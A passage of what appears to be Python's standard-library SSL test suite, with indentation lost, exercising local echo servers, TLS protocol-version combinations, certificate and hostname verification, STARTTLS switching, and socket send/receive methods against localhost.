except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
indata = "TEST MESSAGE of mixed case\n"
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
